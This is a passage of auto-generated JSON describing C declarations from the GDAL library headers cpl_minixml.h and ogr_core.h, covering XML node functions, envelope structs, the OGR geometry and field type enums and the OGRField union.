"/usr/include/gdal/cpl_minixml.h:137:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "poRoot", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszTarget", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLGetXMLValue", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:151:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "poRoot", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszDefault", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "CPLCreateXMLNode", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:154:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "poParent", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "eType", "type": { "tag": "CPLXMLNodeType" } }, { "tag": "parameter", "name": "pszText", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLSerializeXMLTree", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:157:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psNode", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "CPLAddXMLChild", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:158:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psParent", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "psChild", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLRemoveXMLChild", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:160:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psParent", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "psChild", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLAddXMLSibling", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:162:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psOlderSibling", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "psNewSibling", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLCreateXMLElementAndValue", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:164:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psParent", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszValue", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLAddXMLAttributeAndValue", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:167:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psParent", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszValue", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLCloneXMLTree", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:170:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psTree", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLSetXMLValue", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:171:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psRoot", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszValue", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLStripXMLNamespace", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:173:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psRoot", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszNameSpace", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "bRecurse", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLCleanXMLElementName", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:176:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLParseXMLFile", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:178:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "CPLSerializeXMLTreeToFile", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:179:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "psTree", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "OGREnvelope", "location": "/usr/include/gdal/ogr_core.h:148:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 64, "location": "/usr/include/gdal/ogr_core.h:142:9", "bit-size": 256, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "MinX", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MaxX", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MinY", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MaxY", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "OGREnvelope3D", "location": "/usr/include/gdal/ogr_core.h:259:3", "type": { "tag": "struct", "ns": 1113, "name": "", "id": 65, "location": "/usr/include/gdal/ogr_core.h:251:9", "bit-size": 384, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "MinX", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MaxX", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MinY", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MaxY", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MinZ", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "MaxZ", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "function", "name": "OGRMalloc", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:266:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "OGRCalloc", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:267:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "OGRRealloc", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:268:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "OGRStrdup", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:269:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGRFree", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:270:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "OGRErr", "location": "/usr/include/gdal/ogr_core.h:290:13", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "OGRBoolean", "location": "/usr/include/gdal/ogr_core.h:306:17", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "", "id": 66, "location": "/usr/include/gdal/ogr_core.h:317:9", "fields": [{ "tag": "field", "name": "wkbUnknown", "value": 0 }, { "tag": "field", "name": "wkbPoint", "value": 1 }, { "tag": "field", "name": "wkbLineString", "value": 2 }, { "tag": "field", "name": "wkbPolygon", "value": 3 }, { "tag": "field", "name": "wkbMultiPoint", "value": 4 }, { "tag": "field", "name": "wkbMultiLineString", "value": 5 }, { "tag": "field", "name": "wkbMultiPolygon", "value": 6 }, { "tag": "field", "name": "wkbGeometryCollection", "value": 7 }, { "tag": "field", "name": "wkbCircularString", "value": 8 }, { "tag": "field", "name": "wkbCompoundCurve", "value": 9 }, { "tag": "field", "name": "wkbCurvePolygon", "value": 10 }, { "tag": "field", "name": "wkbMultiCurve", "value": 11 }, { "tag": "field", "name": "wkbMultiSurface", "value": 12 }, { "tag": "field", "name": "wkbCurve", "value": 13 }, { "tag": "field", "name": "wkbSurface", "value": 14 }, { "tag": "field", "name": "wkbPolyhedralSurface", "value": 15 }, { "tag": "field", "name": "wkbTIN", "value": 16 }, { "tag": "field", "name": "wkbTriangle", "value": 17 }, { "tag": "field", "name": "wkbNone", "value": 100 }, { "tag": "field", "name": "wkbLinearRing", "value": 101 }, { "tag": "field", "name": "wkbCircularStringZ", "value": 1008 }, { "tag": "field", "name": "wkbCompoundCurveZ", "value": 1009 }, { "tag": "field", "name": "wkbCurvePolygonZ", "value": 1010 }, { "tag": "field", "name": "wkbMultiCurveZ", "value": 1011 }, { "tag": "field", "name": "wkbMultiSurfaceZ", "value": 1012 }, { "tag": "field", "name": "wkbCurveZ", "value": 1013 }, { "tag": "field", "name": "wkbSurfaceZ", "value": 1014 }, { "tag": "field", "name": "wkbPolyhedralSurfaceZ", "value": 1015 }, { "tag": "field", "name": "wkbTINZ", "value": 1016 }, { "tag": "field", "name": "wkbTriangleZ", "value": 1017 }, { "tag": "field", "name": "wkbPointM", "value": 2001 }, { "tag": "field", "name": "wkbLineStringM", "value": 2002 }, { "tag": "field", "name": "wkbPolygonM", "value": 2003 }, { "tag": "field", "name": "wkbMultiPointM", "value": 2004 }, { "tag": "field", "name": "wkbMultiLineStringM", "value": 2005 }, { "tag": "field", "name": "wkbMultiPolygonM", "value": 2006 }, { "tag": "field", "name": "wkbGeometryCollectionM", "value": 2007 }, { "tag": "field", "name": "wkbCircularStringM", "value": 2008 }, { "tag": "field", "name": "wkbCompoundCurveM", "value": 2009 }, { "tag": "field", "name": "wkbCurvePolygonM", "value": 2010 }, { "tag": "field", "name": "wkbMultiCurveM", "value": 2011 }, { "tag": "field", "name": "wkbMultiSurfaceM", "value": 2012 }, { "tag": "field", "name": "wkbCurveM", "value": 2013 }, { "tag": "field", "name": "wkbSurfaceM", "value": 2014 }, { "tag": "field", "name": "wkbPolyhedralSurfaceM", "value": 2015 }, { "tag": "field", "name": "wkbTINM", "value": 2016 }, { "tag": "field", "name": "wkbTriangleM", "value": 2017 }, { "tag": "field", "name": "wkbPointZM", "value": 3001 }, { "tag": "field", "name": "wkbLineStringZM", "value": 3002 }, { "tag": "field", "name": "wkbPolygonZM", "value": 3003 }, { "tag": "field", "name": "wkbMultiPointZM", "value": 3004 }, { "tag": "field", "name": "wkbMultiLineStringZM", "value": 3005 }, { "tag": "field", "name": "wkbMultiPolygonZM", "value": 3006 }, { "tag": "field", "name": "wkbGeometryCollectionZM", "value": 3007 }, { "tag": "field", "name": "wkbCircularStringZM", "value": 3008 }, { "tag": "field", "name": "wkbCompoundCurveZM", "value": 3009 }, { "tag": "field", "name": "wkbCurvePolygonZM", "value": 3010 }, { "tag": "field", "name": "wkbMultiCurveZM", "value": 3011 }, { "tag": "field", "name": "wkbMultiSurfaceZM", "value": 3012 }, { "tag": "field", "name": "wkbCurveZM", "value": 3013 }, { "tag": "field", "name": "wkbSurfaceZM", "value": 3014 }, { "tag": "field", "name": "wkbPolyhedralSurfaceZM", "value": 3015 }, { "tag": "field", "name": "wkbTINZM", "value": 3016 }, { "tag": "field", "name": "wkbTriangleZM", "value": 3017 }, { "tag": "field", "name": "wkbPoint25D", "value": 2147483649 }, { "tag": "field", "name": "wkbLineString25D", "value": 2147483650 }, { "tag": "field", "name": "wkbPolygon25D", "value": 2147483651 }, { "tag": "field", "name": "wkbMultiPoint25D", "value": 2147483652 }, { "tag": "field", "name": "wkbMultiLineString25D", "value": 2147483653 }, { "tag": "field", "name": "wkbMultiPolygon25D", "value": 2147483654 }, { "tag": "field", "name": "wkbGeometryCollection25D", "value": 2147483655 }] }, { "tag": "typedef", "ns": 0, "name": "OGRwkbGeometryType", "location": "/usr/include/gdal/ogr_core.h:407:3", "type": { "tag": ":enum", "name": "", "id": 66 } }, { "tag": "enum", "ns": 0, "name": "", "id": 67, "location": "/usr/include/gdal/ogr_core.h:423:9", "fields": [{ "tag": "field", "name": "wkbVariantOldOgc", "value": 0 }, { "tag": "field", "name": "wkbVariantIso", "value": 1 }, { "tag": "field", "name": "wkbVariantPostGIS1", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "OGRwkbVariant", "location": "/usr/include/gdal/ogr_core.h:428:3", "type": { "tag": ":enum", "name": "", "id": 67 } }, { "tag": "function", "name": "OGRGeometryTypeToName", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:467:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGRMergeGeometryTypes", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:468:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eMain", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "eExtra", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGRMergeGeometryTypesEx", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:470:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eMain", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "eExtra", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "bAllowPromotingToCurves", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_Flatten", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:473:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_SetZ", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:474:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_SetM", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:475:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_SetModifier", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:476:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "bSetZ", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bSetM", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_HasZ", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:477:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_HasM", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:478:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_IsSubClassOf", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:479:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "eSuperType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_IsCurve", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:481:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_IsSurface", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:482:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_IsNonLinear", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:483:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_GT_GetCollection", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:484:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_GetCurve", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:485:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_GT_GetLinear", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:486:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eType", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "enum", "ns": 0, "name": "", "id": 68, "location": "/usr/include/gdal/ogr_core.h:489:9", "fields": [{ "tag": "field", "name": "wkbXDR", "value": 0 }, { "tag": "field", "name": "wkbNDR", "value": 1 }] }, { "tag": "typedef", "ns": 0, "name": "OGRwkbByteOrder", "location": "/usr/include/gdal/ogr_core.h:493:3", "type": { "tag": ":enum", "name": "", "id": 68 } }, { "tag": "enum", "ns": 0, "name": "", "id": 69, "location": "/usr/include/gdal/ogr_core.h:594:9", "fields": [{ "tag": "field", "name": "OFTInteger", "value": 0 }, { "tag": "field", "name": "OFTIntegerList", "value": 1 }, { "tag": "field", "name": "OFTReal", "value": 2 }, { "tag": "field", "name": "OFTRealList", "value": 3 }, { "tag": "field", "name": "OFTString", "value": 4 }, { "tag": "field", "name": "OFTStringList", "value": 5 }, { "tag": "field", "name": "OFTWideString", "value": 6 }, { "tag": "field", "name": "OFTWideStringList", "value": 7 }, { "tag": "field", "name": "OFTBinary", "value": 8 }, { "tag": "field", "name": "OFTDate", "value": 9 }, { "tag": "field", "name": "OFTTime", "value": 10 }, { "tag": "field", "name": "OFTDateTime", "value": 11 }, { "tag": "field", "name": "OFTInteger64", "value": 12 }, { "tag": "field", "name": "OFTInteger64List", "value": 13 }, { "tag": "field", "name": "OFTMaxType", "value": 13 }] }, { "tag": "typedef", "ns": 0, "name": "OGRFieldType", "location": "/usr/include/gdal/ogr_core.h:611:3", "type": { "tag": ":enum", "name": "", "id": 69 } }, { "tag": "enum", "ns": 0, "name": "", "id": 70, "location": "/usr/include/gdal/ogr_core.h:622:9", "fields": [{ "tag": "field", "name": "OFSTNone", "value": 0 }, { "tag": "field", "name": "OFSTBoolean", "value": 1 }, { "tag": "field", "name": "OFSTInt16", "value": 2 }, { "tag": "field", "name": "OFSTFloat32", "value": 3 }, { "tag": "field", "name": "OFSTJSON", "value": 4 }, { "tag": "field", "name": "OFSTMaxSubType", "value": 4 }] }, { "tag": "typedef", "ns": 0, "name": "OGRFieldSubType", "location": "/usr/include/gdal/ogr_core.h:636:3", "type": { "tag": ":enum", "name": "", "id": 70 } }, { "tag": "enum", "ns": 0, "name": "", "id": 71, "location": "/usr/include/gdal/ogr_core.h:642:9", "fields": [{ "tag": "field", "name": "OJUndefined", "value": 0 }, { "tag": "field", "name": "OJLeft", "value": 1 }, { "tag": "field", "name": "OJRight", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "OGRJustification", "location": "/usr/include/gdal/ogr_core.h:647:3", "type": { "tag": ":enum", "name": "", "id": 71 } }, { "tag": "typedef", "ns": 0, "name": "OGRField", "location": "/usr/include/gdal/ogr_core.h:733:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 72, "location": "/usr/include/gdal/ogr_core.h:683:9", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "Integer", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "Integer64", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "GIntBig" } }, { "tag": "field", "name": "Real", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "String", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "IntegerList", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "struct", "ns": 0, "name": "", "id": 73, "location": "/usr/include/gdal/ogr_core.h:690:5", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nCount", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "paList", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }] } }, { "tag": "field", "name": "Integer64List", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "struct", "ns": 0, "name": "", "id": 74, "location": "/usr/include/gdal/ogr_core.h:695:5", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nCount", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "paList", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "GIntBig" } } }] } }, { "tag": "field", "name": "RealList", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "struct", "ns": 0, "name": "", "id": 75, "location": "/usr/include/gdal/ogr_core.h:700:5", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nCount", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "paList", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }] } }, { "tag": "field", "name": "StringList", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "struct", "ns": 0, "name": "", "id": 76, "location": "/usr/include/gdal/ogr_core.h:705:5", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nCount", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "paList", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }] } }, { "tag": "field", "name": "Binary", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "struct", "ns": 4, "name": "", "id": 77, "location": "/usr/include/gdal/ogr_core.h:710:5", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "nCount", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "paData", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }] } }, { "tag": "field", "name": "Set", "bit-offset": 0, "bit-size": 96, "bit-alignment": 32, "type": { "tag": "struct", "ns": 0, "name": "", "id": 78, "location": "/usr/include/gdal/ogr_core.h:715:5", "bit-size": 96, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "nMarker1", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "nMarker2", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "nMarker3", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }] } }, { "tag": "field", "name": "Date", "bit-offset": 0, 